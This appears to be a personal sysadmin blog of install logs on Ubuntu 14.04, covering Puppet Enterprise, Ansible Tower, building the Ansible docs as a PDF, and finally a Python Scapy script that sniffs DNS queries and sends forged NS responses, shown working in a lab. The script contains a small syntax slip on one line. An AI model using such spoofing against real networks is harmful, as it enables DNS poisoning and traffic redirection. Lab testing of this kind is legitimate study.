lost and found ( for me ? )

install puppet enterprise(PE) on Ubuntu 14.04 and manage agent nodes

Here are logs when installing puppet enterprise 3.7.2 on Ubuntu 14.04.

PE*1 ( master.localdomain )
agent * 2 ( agent01.localdomain, agent02.localdomain )

all machines are Ubuntu 14.04.

hostname is

master.localdomain, agent01.localdomain, agent02.localdomain.

[ install PE ]

before installing PE, configure hostname.
# hostname
master

# grep master /etc/hosts
192.168.122.5 master.localdomain master

I have not installed puppet master on this machine.
the installer of PE will install required packages.

# tar xzvf puppet-enterprise-3.7.2-ubuntu-14.04-amd64.tar.gz

# cd puppet-enterprise-3.7.2-ubuntu-14.04-amd64/

run installer.
# ./puppet-enterprise-installer

Please go to https://master.localdomain:4567 in your browser to continue
installation. Be sure to use https:// and that port 4567 is reachable
through the firewall.

open an web browser and access to https://<IP>:4567
port number might differ from TCP 4567.

enter the hostname and credentials for admin.

It took 20 minutes or so to finish the installation.

After finishing the installation, access to https://<IP>




add nodes to manages those via PE.
access to a machine you want to manage over SSH.

on the agent.
I configured PE hostname in /etc/hosts file on the agent so that the agent can access to the PE with hostname instead of IP address.
download the install script from PE and run the install script.
# curl https://master.localdomain:8140/packages/current/install.bash -k | bash

Notice: /Service[pe-puppet]/ensure: ensure changed 'stopped' to 'running'
service { 'pe-puppet':
 ensure => 'running',
 enable => 'true',
}

on PE console, sign the certificate of the agent.
click “1 Node Request” -> Accept

the agent01.localdomain are managed by PE.

Here is a report of agent01
PE console -> Reports -> agent01


service status of SSH


install ansible tower on Ubuntu 14.04

install ansible tower on Ubuntu 14.04

Here are logs when installing ansible tower on Ubuntu 14.04.

Before installing ansible tower, install ansible
# tail -1 /etc/lsb-release
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

# apt-get install software-properties-common
# apt-add-repository ppa:ansible/ansible
# apt-get update
# apt-get install ansible

# ansible --version
ansible 1.8.2
 configured module search path = None

install ansible tower.
# tar xzvf ansible-tower-setup-latest.tar.gz
# cd ansible-tower-setup-2.1.0/
# ./configure --local


# ./configure --local
-------------------------------------------
Welcome to the Ansible Tower Install Wizard
-------------------------------------------

This wizard will guide you through the setup process.

LOCAL INSTALLATION
You are installing Ansible Tower on this machine, using an internal database.

PASSWORDS
For security reasons, since this is a new install, you must specify the
following application passwords.

Enter the desired Ansible Tower admin user password:
Enter the desired Munin password:

REVIEW
You selected the following options:

The primary Tower machine is: localhost
Tower will operate on an INTERNAL database.

Are these settings correct (y/n)? y
Settings saved to tower_setup_conf.yml.

FINISHED!
You have completed the setup wizard. You may execute the installation of
Ansible Tower by issuing the following command:

sudo ./setup.sh

error.
# ./setup.sh

TASK: [packages_ubuntu | install awx package with the apt module] *************
failed: [localhost] => {"failed": true}
stderr: E: Version '2.1.0-*' for 'ansible-tower' was not found

stdout: Reading package lists...
Building dependency tree...
Reading state information...

msg: 'apt-get install 'ansible-tower=2.1.0-*'' failed: E: Version '2.1.0-*' for 'ansible-tower' was not found


FATAL: all hosts have already failed -- aborting

PLAY RECAP ********************************************************************
          to retry, use: --limit @/root/site.retry

localhost                  : ok=19   changed=5    unreachable=0    failed=1   

Oops!  An error occured while running setup.

How about installing the following packages?
Someone, who succeeded in setting up an ansible tower, installed following packages in advance, so I tried that.
# apt-get install python-dev python-yaml python-paramiko python-jinja2 python-pip sshpass

try again.
I still faced the same error..
TASK: [packages_ubuntu | install awx package with the apt module] *************
failed: [localhost] => {"failed": true}
stderr: E: Version '2.1.0-*' for 'ansible-tower' was not found

stdout: Reading package lists...
Building dependency tree...
Reading state information...

msg: 'apt-get install 'ansible-tower=2.1.0-*'' failed: E: Version '2.1.0-*' for 'ansible-tower' was not found


FATAL: all hosts have already failed -- aborting

PLAY RECAP ********************************************************************
          to retry, use: --limit @/root/site.retry

localhost                  : ok=19   changed=0    unreachable=0    failed=1   

Oops!  An error occured while running setup.

Let’s see the detail information of ansible-tower.
New version 2.1.1-1 has been released.
Actually two or three weeks has been passed since I downloaded ansible tower..
# apt-cache show ansible-tower
Package: ansible-tower
Version: 2.1.1-1
Architecture: all
Maintainer: Ansible <support@ansible.com>
Installed-Size: 123341
Depends: apache2, libapache2-mod-wsgi, libzmq3, libzmq3-dev, postgresql, python, python-psycopg2, python-setuptools, python-openssl, python-ldap, python-gevent, python-passlib, python-psutil, python-zmq, supervisor, proot, redis-server, redis-tools, rsyslog, sosreport, sshpass, subversion, mercurial, git, munin, munin-node, ansible
Conflicts: awx
Replaces: awx
Provides: awx
Homepage: http://www.ansible.com/

download ansible tower 2.1.1 and install that.
okay, I was able to install ansible tower.
 107  tar xzvf ansible-tower-setup-latest.tar.gz
 108  cd ansible-tower-setup-2.1.1/
 109  ls
 110  ./configure --local
 111  ./setup.sh


PLAY RECAP ********************************************************************
localhost                  : ok=89   changed=52   unreachable=0    failed=0   

The setup process completed successfully.
Setup log saved to /var/log/tower/setup-2015-02-13-02:33:15.log

The problem was that I tried to install the old version.

# /etc/init.d/ansible-tower status
Showing Tower Status
9.3/main (port 5432): online
redis-server is running
* apache2 is running
is running


access to https:// < ansible tower IP>

I downloaded the free license key which can manage nodes up to 10 and activated that key.


how to stop ansible tower.
# /etc/init.d/ansible-tower stop
Stopping Tower
* Stopping PostgreSQL 9.3 database server                               [ OK ]
Stopping redis-server: redis-server.
* Stopping web server apache2                                                   *
Stopping supervisor: supervisord.
Waiting to allow supervisor time to cleanup ...

Ansible : create an ansible doc as PDF format

Reference
https://github.com/bonndan/ansible-userguide-pdf

Here are logs when creating an ansible 1.8 doc as PDF foramt.

install required packages to make a PDF.

# apt-get install texlive-latex-base texlive-latex-extra texlive-fonts-recommended
# apt-get install python-sphinx
# git clone https://github.com/ansible/ansible.git
# git clone https://github.com/bonndan/ansible-userguide-pdf.git

create a PDF doc.

# cd ansible-userguide-pdf/

# python build-site.py ../ansible/docsite/rst/
Creating html documentation ...

# cd latex/

# pdflatex --interaction=nonstopmode ansible.tex

# ls *.pdf
ansible.pdf

get things done!

python scapy : send fake DNS responses


# tail -1 /etc/lsb-release
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

# dpkg -l python-scapy
ii  python-scapy                2.2.0-1            all                Packet generator/sniffer and network scanner/discovery


Here is a sample script of how to send fake DNS responses.
This script returns fake NS records in the authority sections.
# cat -n fake_DNS.py
    1 #!/usr/bin/env python
    2
    3 from scapy.all import *
    4 import random
    5 import string
    6
    7 domain = 'bar.com'
    8
    9 def id_generator(size=6, chars=string.ascii_lowercase ):
   10    return ''.join(random.choice(chars) for _ in range(size))
   11
   12 def dns_spoof(pkt):
   13 #    if domain in pkt[DNS].qd.qname:
   14    if pkt.dport == 53:
   15            spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
   16                          UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
   17                          DNS(id=pkt[DNS].id, qr=1L, aa=0L, qd=pkt[DNS].qd, qdcount=1, ancount=0, nscount=4, arcount=0,\
   18                          an=None, ns=(DNSRR(rrname=pkt[DNS].qd.qname, type='NS', ttl=3600, rdata='ns1.%s.com' % (id_generator()))/DNSRR(rrname=pkt[DNS].qd.qname, type='NS', ttl=3600, rdata='ns2.%s.com' % id_generator())/DNSRR(rrname=pkt[DNS].qd.qname, type='NS', ttl=3600, rdata='ns3.%s.com' % id_generator())/DNSRR(rrname=pkt[DNS].qd.qname, type='NS', ttl=3600, rdata='ns4.%s.com's % id_generator())))
   19            send(spoofed_pkt)
   20 sniff(filter='udp port 53', iface='eth0', store=0, prn=dns_spoof)


run the script.
# python fake_DNS.py
WARNING: No route found for IPv6 destination :: (no default route?)


send DNS queries to the machine on which the script is running.


This script returns ns1-ns4.<random>.com as name servers in the authority sections.
There are no additional records.
$ dig @192.168.122.5 foo.com

; <<>> DiG 9.9.5-3ubuntu0.1-Ubuntu <<>> @192.168.122.5 foo.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31796
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;foo.com. IN A

;; AUTHORITY SECTION:
foo.com. 3600 IN NS ns1.zsblef.com.
foo.com. 3600 IN NS ns2.loooqo.com.
foo.com. 3600 IN NS ns3.brrppi.com.
foo.com. 3600 IN NS ns4.yjeger.com.

$ dig @192.168.122.5 goooogle.com

; <<>> DiG 9.9.5-3ubuntu0.1-Ubuntu <<>> @192.168.122.5 goooogle.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 941
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;goooogle.com. IN A

;; AUTHORITY SECTION:
goooogle.com. 3600 IN NS ns1.bqurdm.com.
goooogle.com. 3600 IN NS ns2.zwitma.com.
goooogle.com. 3600 IN NS ns3.gmdcjr.com.
goooogle.com. 3600 IN NS ns4.ltctmg.com.